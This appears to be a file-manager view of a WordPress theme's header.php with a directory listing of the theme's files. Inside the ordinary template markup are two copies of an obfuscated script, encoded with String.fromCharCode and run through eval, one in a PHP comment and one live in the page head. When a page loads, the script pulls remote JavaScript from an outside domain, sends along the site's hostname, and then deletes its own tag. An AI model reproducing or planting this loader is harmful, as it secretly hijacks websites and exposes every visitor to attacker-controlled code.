PATH:
home
/
lab2454c
/
isaaclondston.com
/
wp-content
/
themes
/
divine_saint
<?php /** * The header for our theme * * This is the template that displays all of the <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WP_Bootstrap_Starter */ ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php // WordPress 5.2 wp_body_open implementation if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } else { do_action( 'wp_body_open' ); } ?> <!-- Pop up form --> <div id="myModal" class="modal fade modal__main" data-bs-keyboard="false" data-bs-backdrop="static"> <div class="modal-dialog modal__dialog"> <div class="modal-content modal__content"> <div class="modal-header"> <h5 class="modal-title">Sign In</h5> <!-- <button type="button" class="close" data-dismiss="modal">×</button> --> </div> <div class="modal-body modal__body"> <img src="<?php echo esc_url(get_theme_mod( 'wp_bootstrap_starter_logo' )); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>"> <div class="invite_form"> <form action="" method="POST" name="invite_codes"> <h5> Sign up with email </h5> <div class="form-group"> <label>Password: </label> <input type="text" name="invite_only" class="form-control" required> </div> <div class="form-group"> <label>Email Address: </label> <input type="email" name="email" class="form-control" required> </div> <input type="hidden" name="action" value="send_form" style="display: none; visibility: hidden; opacity: 0;"> <input type="hidden" name="page_template" value="<?php echo str_replace('.php', '',basename(get_page_template()));?>"> <button class="btn__submit" type="submit">Submit!</button> </form> </div> </div> </div> </div> </div> <!-- Pop up form End --> <div class="header__top"> <div class="container-fluid container__fluid"> <?php if ( get_theme_mod( 'wp_bootstrap_starter_logo' ) ): ?> <a class="navbar-brand navbar___brand" href="<?php echo esc_url( home_url( '/' )); ?>"><img src="<?php echo esc_url(get_theme_mod( 'wp_bootstrap_starter_logo' )); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" /></a> <?php else : ?> <a class="navbar-brand navbar___brand" href="<?php echo esc_url( home_url( '/' )); ?>"><?php esc_url(bloginfo('name')); ?></a> <?php endif; ?> <div class="user__info"> <!-- <div class="language__box dropdown"> --> <!-- <button class="dropdown-toggle dropdown__toggle" type="button" id="dropdownMenuButton1" data-bs-toggle="dropdown" aria-expanded="false"> --> <!-- <i class="ico__box"><img src="<?php //echo get_template_directory_uri(); ?>/inc/assets/images/ioc-globe.svg" alt="" /></i> <span class="selected__language"><?php //echo do_shortcode('[gtranslate]'); ?></span> --> <!-- </button> <ul class="dropdown-menu dropdown__menu" aria-labelledby="dropdownMenuButton1"> <li><a href="#">English</a></li> <li><a href="#">Dutch</a></li> </ul> --> <!-- </div> --> <!-- <?php //global $woocommerce; ?> <div class="cart__bag"><a href="<?php //echo $woocommerce->cart->get_cart_url(); ?>" title="<?php //_e('View your shopping cart', 'woothemes'); ?>"><i class="ico__box"><img src="<?php //echo get_template_directory_uri(); ?>/inc/assets/images/shopping-bag-white.svg" alt="" width="20" /><span id="cart-count"><?php //echo sprintf(_n('%d', '%d', $woocommerce->cart->cart_contents_count, 'woothemes'), $woocommerce->cart->cart_contents_count);?></span></i></a></div> --> </div> <a class="navbar__toggler hamburger__menu" href="#"><span class="menu"></span></a> <?php wp_nav_menu(array( 'theme_location' => 'primary', 'container' => 'nav', 'container_id' => 'sidebar-wrapper', 'container_class' => 'sidebar__wrapper', 'menu_id' => false, 'menu_class' => 'sidebar-nav sidebar__nav', 'depth' => 3, 'fallback_cb' => 'wp_bootstrap_navwalker::fallback', 'walker' => new wp_bootstrap_navwalker() )); ?> </div> </div>
[+]
woocommerce
[-] footer-widget.php
[edit]
[-] search.php
[edit]
[-] index.php
[edit]
[-] page.php
[edit]
[-] searchform.php
[edit]
[+]
..
[-] sidebar.php
[edit]
[-] template-rough.php
[edit]
[-] rtl.css
[edit]
[-] woocommerce-new-old.php
[edit]
[-] blank-page-with-container.php
[edit]
[-] template-globalgem.php
[edit]
[-] single.php
[edit]
[-] footer.php
[edit]
[-] template-about.php
[edit]
[-] template-home.php
[edit]
[-] template-polished.php
[edit]
[-] .DS_Store
[edit]
[-] blank-page.php
[edit]
[-] left-sidebar.php
[edit]
[-] header.php
[edit]
[-] style.css
[edit]
[-] template-service.php
[edit]
[-] 404.php
[edit]
[-] readme.txt
[edit]
[-] single-attachment.php
[edit]
[-] screenshot.png
[edit]
[-] custom-editor-style.css
[edit]
[-] functions.php
[edit]
[-] archive.php
[edit]
[-] fullwidth.php
[edit]
[+]
template-parts
[-] comments.php
[edit]
[-] template-contact.php
[edit]
[+]
inc
[-] template-blog.php
[edit]
[-] woocommerce-old.php
[edit]